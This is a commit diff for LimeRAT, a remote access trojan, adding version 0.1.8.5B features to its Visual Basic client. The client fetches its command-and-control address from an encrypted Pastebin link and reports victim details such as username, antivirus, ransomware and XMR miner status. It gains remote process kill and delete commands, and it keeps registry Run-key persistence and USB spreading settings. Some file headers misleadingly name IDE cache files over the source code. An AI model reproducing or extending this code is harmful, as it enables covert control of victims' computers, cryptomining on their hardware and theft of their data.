UPDATE v0.1.8.5B

-Added multi port listener
-Fixed when client can't connect on freshly installed windows7
-Updated XMR miner

Author: Nyrotication

.vs/LimeRAT/v15/.suo

@@ -175,7 +175,7 @@
                     Catch ex As Exception
                     End Try
                 Else
-                    Return CPU()
+                    Return CPU_GPU()
                 End If
             Catch ex As Exception
             End Try
@@ -193,19 +193,48 @@
             End Try
         End Function
 
-        Public Shared Function CPU() As String
+        Public Shared Function CPU_GPU() As String
             Try
+                'Dim VideoCard As String = ""
+                'Dim objquery As New Management.ObjectQuery("SELECT * FROM Win32_VideoController")
+                'Dim objSearcher As New Management.ManagementObjectSearcher(objquery)
+
+                'For Each MemObj As Management.ManagementObject In objSearcher.Get
+                '    VideoCard = VideoCard & (MemObj("Name")) & " "
+                'Next
+                'If VideoCard.ToLower.Contains("nvidia") OrElse VideoCard.ToLower.Contains("amd") Then
+                '    Return VideoCard
+                'End If
+
                 Dim P As New Management.ManagementObject("Win32_Processor.deviceid=""CPU0""")
                 P.Get()
                 If P("Name").ToString.Contains("Intel") Then
                     Return P("Name").ToString.Replace("(R)", "").Replace("Core(TM)", "").Replace("CPU", "")
                 End If
                 Return P("Name").ToString
+
             Catch ex As Exception
-                Return "Err > Idle"
+                Return "Unknow"
             End Try
 
         End Function
+
+        Public Shared Function dotNET() As String
+            Try
+                Dim dot As New Text.StringBuilder
+                For Each x In IO.Directory.GetDirectories(Runtime.InteropServices.RuntimeEnvironment.GetRuntimeDirectory().Substring(0, 34))
+                    If x.Contains("v4.0") Then
+                        dot.Append("v4.0")
+                    ElseIf x.Contains("v2.0") Then
+                        dot.Append("v2.0 ")
+                    End If
+                Next
+                Return dot.ToString
+            Catch ex As Exception
+                Return "Error"
+            End Try
+        End Function
+
     End Class
 
 End Namespace

.vs/LimeRAT/v15/Server/sqlite3/storage.ide

@@ -9,9 +9,9 @@
         Public Shared HOST As String 'IP
         Public Shared PORT As Integer 'PORT
         Public Shared EncryptionKey As String = "NYANCAT" 'encryption/decryption key
-        Public Shared ENDOF As String = "|'N'|" 'socket key
-        Public Shared SPL As String = "|'L'|" 'split bytes
-        Public Shared EXE As String = "CLIENT.exe" 'client name
+        Public Shared ENDOF As String = "|'N'|" 'endof
+        Public Shared SPL As String = "|'L'|" 'split data
+        Public Shared EXE As String = "CLIENT.exe" 'client drop name
         Public Shared MTX As Threading.Mutex
         Public Shared USB As Boolean = False 'usb spread
         Public Shared PIN As Boolean = False 'pin spread

.vs/LimeRAT/v15/Server/sqlite3/storage.ide-shm

@@ -89,12 +89,14 @@ re:
                 C.SendTimeout = -1
 
 #If DEBUG Then
+
                 C_Settings.HOST = "127.0.0.1"
                 C_Settings.PORT = 8989
 #Else
-
                 Using WC As New Net.WebClient 'Pastebin, split by ":" IP:PORT
                     Try
+                        Dim myCredentials As New Net.NetworkCredential("", "")
+                        WC.Credentials = myCredentials
                         Dim Response As String = WC.DownloadString(C_Encryption.AES_Decrypt(C_Settings.Pastebin))
                         C_Settings.HOST = Response.Split(":")(0)
                         C_Settings.PORT = Response.Split(":")(1)
@@ -108,12 +110,12 @@ re:
                 Alive = True
                 MS = New IO.MemoryStream
 
-                Send(String.Concat("info", SPL, C_ID.HWID, SPL, C_ID.UserName, SPL, "v0.1.8.4B", SPL, C_ID.MyOS, " ", C_ID.Bit, SPL,
-                                  C_ID.INDATE, SPL, C_ID.AV, SPL, C_ID.Rans, SPL, C_ID.XMR, SPL, C_ID.USBSP, SPL, "...", SPL, " ", SPL,
+                Send(String.Concat("info", SPL, C_ID.HWID, SPL, C_ID.UserName, SPL, "v0.1.8.5B", SPL, C_ID.MyOS, " ", C_ID.Bit, SPL,
+                                  C_ID.INDATE, SPL, C_ID.AV, SPL, C_ID.Rans, SPL, C_ID.XMR, SPL, C_ID.USBSP, SPL, C_Settings.PORT, SPL, C_ID.dotNET, SPL, "...", SPL, " ", SPL,
                                   C_ID.Privileges.ToString, SPL, C_Settings.fullpath))
 
-                Dim T As New System.Threading.TimerCallback(AddressOf PING)
-                Tick = New System.Threading.Timer(T, Nothing, 0, 1)
+                Dim T As New Threading.TimerCallback(AddressOf PING)
+                Tick = New Threading.Timer(T, Nothing, 0, 1)
 
                 Return Alive
             Catch ex As Exception
@@ -156,7 +158,7 @@ re:
                     End If
                 End If
 
-                KAP += 1 : If KAP > 3000 Then KAP = 0 : Send("KA")
+                KAP += 1 : If KAP > 5000 Then KAP = 0 : Send("KA")
             Catch : End Try
         End Sub
 

.vs/LimeRAT/v15/Server/sqlite3/storage.ide-wal

@@ -110,22 +110,42 @@ cc:
     End Sub
 
     Public Shared Sub Data(ByVal b As Byte())
+        On Error Resume Next
         Dim A As String() = Split(AES_Decrypt(BS(b)), SPL)
 
-        Try
-            Select Case A(0)
+
+        Select Case A(0)
                 Case "Sysinfo"
                     Send("SysInfo" + SPL + ID.Getsystem + SPL + HWID)
 
                 Case "PROC"
-                    Dim PR As String = String.Empty
-                    Dim PR_LIST As Process() = Process.GetProcesses()
-                    For Each P As Process In PR_LIST
-                        Try : PR += P.ProcessName & "|'P'|" & P.Id & "|'P'|" & P.MainModule.FileName & "|'P'|" : Catch : End Try ' file |'p'| 1 |'p'| c:/file.exe |'p'|
-                    Next
-                    Send("PROC" + SPL + PR + SPL + Windows.Forms.Application.ExecutablePath + SPL + HWID)
+                Dim L As String = ""
+                Dim searcher As New Management.ManagementObjectSearcher("Select * from Win32_Process")
+                Dim processList As Management.ManagementObjectCollection = searcher.Get()
+                For Each obj As Management.ManagementObject In processList
+                    Dim owner = {""}
+                    Dim returnVal = Convert.ToInt32(obj.InvokeMethod("GetOwner", owner))
+                    If returnVal = 0 Then
+                        If owner(0) = Environment.UserName Then
+                            L += obj.Item("Name") & "|'P'|" & obj.Item("ProcessId") & "|'P'|" & obj.Item("ExecutablePath") & "|'P'|" ' file |'p'| 1 |'p'| c:/file.exe |'p'|
+                        End If
+                    End If
+                Next
+                Send("PROC" + SPL + L + SPL + Windows.Forms.Application.ExecutablePath + SPL + HWID)
+
+                Case "PROCKILL"
+                Dim PR As Process
+                PR = Process.GetProcessById(A(1).ToString)
+                PR.Kill()
 
-                Case "STUP" 'credit ĦΔĆҜƗŇǤ ŞØ؃
+            Case "PROCDEL"
+                Dim PR As Process
+                PR = Process.GetProcessById(A(1).ToString)
+                PR.Kill()
+                Threading.Thread.Sleep(2000)
+                IO.File.Delete(A(2))
+
+            Case "STUP" 'credit ĦΔĆҜƗŇǤ ŞØ؃
 
                     'HKEY_CURRENT_USER_Run
                     Dim MyKey1 As String = "Software\Microsoft\Windows\CurrentVersion\Run\"
@@ -261,9 +281,6 @@ cc:
                     CloseMe()
             End Select
 
-        Catch ex As Exception
-        End Try
-
     End Sub
 
     Public Shared Function SplitByWord(ByVal b As Byte(), ByVal WORD As String) As Array

Project/Client/C_ID.vb

@@ -98,6 +98,7 @@ Public Class Main
                 registryKey3.Close()
             Catch ex As Exception
                 'Send("MSG" + SPL + "HRD! " + ex.Message)
+                Return
             End Try
 
             Try